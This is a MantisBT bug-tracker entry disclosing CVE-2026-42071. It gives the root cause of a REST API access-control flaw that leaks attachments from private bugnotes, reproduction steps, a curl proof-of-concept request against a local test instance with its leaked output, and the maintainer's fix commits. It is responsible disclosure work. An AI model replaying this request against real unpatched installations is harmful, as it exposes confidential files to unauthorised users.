View Issue Details

WikiRelated ChangesetsJump to Notes
IDProjectCategoryView StatusDate SubmittedLast Update
0036985mantisbtsecuritypublic2026-03-17 18:212026-05-09 19:56
Reporterninjasec Assigned Todregad  
PriorityhighSeverityminorReproducibilityalways
Status closedResolutionfixed 
Product Version2.28.1 
Target Version2.28.2Fixed in Version2.28.2 
Summary0036985: CVE-2026-42071: REST Issue File Listing Leaks Attachments From Hidden Private Bugnotes
Description

MantisBT exposes attachments linked to private bugnotes through the REST issue-file listing endpoint.

When a user can view an issue but cannot view a private bugnote on that issue, GET /api/rest/issues/{id}/files still returns attachments associated with the hidden note, including base64 file content. The normal file download path continues to enforce access control and returns 403 Forbidden, so the disclosure is specific to the listing/content API path.

The root cause is that file_api.php:296 checks bugnote attachment visibility against the parent issue instead of the bugnote itself:
return file_can_view_or_download( 'view', $t_bug_id, $p_uploader_user_id );

As a result, private-bugnote restrictions are skipped during attachment enumeration. IssueFileGetCommand.php:57 then reads and returns the attachment content for each enumerated file.

Affected Code

  • file_api.php:296
  • IssueFileGetCommand.php:57
  • issues_rest.php:539
Steps To Reproduce
  1. Create or use a public issue visible to a low-privileged user.
  2. Add a private bugnote to that issue as another user.
  3. Attach a file to that private bugnote.
  4. Authenticate as a lower-privileged user who can view the issue but not the private bugnote.

  5. Request the issue file list through REST.

    In the verified case:

    • issue id: 1
    • hidden private bugnote id: 1
    • leaked attachment id: 16
    • leaked filename: private-note-attachment.txt

    Visibility check for the low-privileged user showed only bugnotes 7 and 6 as visible:

    7|10|2
    6|50|2

    Attachment 16 was linked to hidden bugnote 1:

    16|1|1|1|private-note-attachment.txt

    Proof of Concept

    Request:

    curl -i 'http://127.0.0.1:8082/api/rest/issues/1/files' \
    -H 'Authorization: REPORTER_API_TOKEN'

    Observed response:

    HTTP/1.1 200 OK
    X-Mantis-Username: reporter
    X-Mantis-LoginMethod: api-token
    Content-Type: application/json

    {
    "files": [
    {
    "id": 12,
    "reporter": {
    "id": 1,
    "name": "administrator"
    },
    "created_at": "2026-03-18T01:58:40+05:30",
    "filename": "soap-admin-issue1.txt",
    "size": 31,
    "content_type": "text/plain; charset=us-ascii",
    "content": "c29hcC1pc3N1ZS1yZXBvcnRlci1hdHRhY2htZW50Cg=="
    },
    {
    "id": 16,
    "reporter": {
    "id": 1,
    "name": "administrator"
    },
    "created_at": "2026-03-18T03:30:19+05:30",
    "filename": "private-note-attachment.txt",
    "size": 24,
    "content_type": "text/plain; charset=us-ascii",
    "content": "cHJpdmF0ZS1ub3RlLWF0dGFjaG1lbnQK"
    }
    ]
    }

    The second entry is the hidden private-bugnote attachment.

    Control request:

    curl -i 'http://127.0.0.1:8082/file_download.php?file_id=16&type=bug' \
    -b 'valid reporter web session cookies'

    Observed response:

    HTTP/1.1 403 Forbidden

Additional Information

Impact

A user who cannot view a private bugnote can still enumerate and retrieve attachments from that note through REST, including full file content. This is a confidentiality issue affecting private note attachments on otherwise visible issues.

TagsNo tags attached.

Relationships

Relationship GraphDependency Graph
related to 0027039 closeddregad CVE-2020-25781: Access to private bug note attachments 
has duplicate 0037092 closeddregad Private Bugnote Attachment Content Leak via REST API 
has duplicate 0037095 closeddregad Private Bugnote Files Disclosure via REST API Get Issues Files Or SOAP API mc_issue_attachment_get 

Activities

dregad

dregad

2026-04-19 20:01

developer   ~0071041

Last edited: 2026-04-24 08:05

Advisory https://github.com/mantisbt/mantisbt/security/advisories/GHSA-pw5x-2mf9-3xc8, CVE request sent.
dregad

dregad

2026-04-28 12:30

developer   ~0071051

CVE-2026-42071 assigned
dregad

dregad

2026-05-02 09:36

developer   ~0071061

@ninjasec Patch is ready for review, https://github.com/mantisbt/mantisbt-private/pull/5. looking forward to receiving your feedback.

While testing, I realized that the SOAP API was vulnerable as well, but from a different code path. Fix is included in the PR.

Related Changesets

MantisBT: master-2.28 77d25d37

2026-05-02 06:25

dregad


Details Diff		 Add $p_bug_id parameter

file_can_download_bugnote_attachments() function's callers usually
already know the bug id. This avoids an unnecessary bugnote_get_field()
call.

Issue 0036985		 Affected Issues
0036985
mod - core/file_api.php Diff File
mod - file_download.php Diff File

MantisBT: master-2.28 5b7f5bc9

2026-05-02 06:29

dregad


Details Diff		 Fix Private Bugnote Attachment Leak via REST API

Add missing $p_bugnote_id argument to file_can_view_or_download() call
in file_can_view_bugnote_attachments. This fixes the incorrect access
check that was giving undue access to private attachments.

Fixes 0036985, GHSA-pw5x-2mf9-3xc8 / CVE-2026-42071		 Affected Issues
0036985
mod - core/file_api.php Diff File

MantisBT: master-2.28 955cb50f

2026-05-02 07:01

dregad


Details Diff		 Fix Private Bugnote Attachment Leak via SOAP API

Incomplete access checks in mci_file_can_download_bug_attachments()
resulted in unauthorized access to attachments.

The function has been removed and replaced by calls to standard file
API functions file_can_download_bug_attachments() and
file_can_download_bugnote_attachments().

Fixes 0036985, GHSA-pw5x-2mf9-3xc8 / CVE-2026-42071		 Affected Issues
0036985
mod - api/soap/mc_file_api.php Diff File